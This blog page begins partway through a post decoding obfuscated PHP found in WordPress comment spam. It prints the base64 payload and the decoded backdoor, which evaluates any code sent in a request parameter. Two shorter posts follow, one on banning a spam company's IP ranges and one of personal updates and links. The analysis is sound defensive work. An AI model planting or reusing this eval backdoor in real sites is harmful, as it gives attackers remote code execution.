eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));

Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=

You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"

Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));

So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));

Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to go to be a request that starts like this http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!

terriko

I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built in lists for blocking comments, but they simply send to the moderation queue, as does popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*

Which covers the majority of the IP that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other ips that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN

terriko

First some me-related updates:

I got to help staff a table at roborave on Saturday. fun! I was too busy to take pictures, so don't ask.

GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.

To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; horray for good timing!

And then some links that amused me:

Check out this awesome quote from the guy who introduced Sriracha sauce to the west.. Just scroll down; it's been helpfully put into the picture of Mr. David Tran. But the article itself is pretty interesting too.
You may have seen the link going around claiming that the Miss Korea contestants all look like clones. I chalked it up to some sort of racist "all Korean people look the same" nonsense, but this analysis of why they all look the same is pretty interesting. Short answer: makeup and photoshop by pageant folk. (Although I bet there's some racism involved in the spread of the link too.)
"Ship just got real." This is the most compelling smooth-jazz voiceover in a trailer for a turn-based boat game that you're going to see today. At least until you watch the second one, which has even more boat puns. J tells me that the game is actually pretty fun even though he only bought it because the trailer was hilarious.
Ever wanted to know if your interface is being messed with by a monkey? Android has you covered with isUserAMonkey().
Also, there exists a set of log.wtf functions in Android. Handy!

Profile

magnio

November 2012

S	M	T	W	T	F	S
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30

Page Summary

Style Credit

Style:: timeasmymeasure

Expand Cut Tags

No cut tags

Page generated May. 20th, 2013 05:28 am

Reading

Adopt a Salamander

Downtime this morning

Virtual Ubuntu Developer Summit 1305

Honeymoon week 2

Ender's Game is morally repugnant

Honeymoon week 1

Our wedding!

Scooter luggage and travel cosplay.

Conversations

Smaller travel bags

Falling down the rabbit hole: An analysis of some questionable blog spam

Remove 80% of your blog comment spam by blocking IPTelligent!

Updates and links

Profile

November 2012

Most Popular Tags

Page Summary

Style Credit

Expand Cut Tags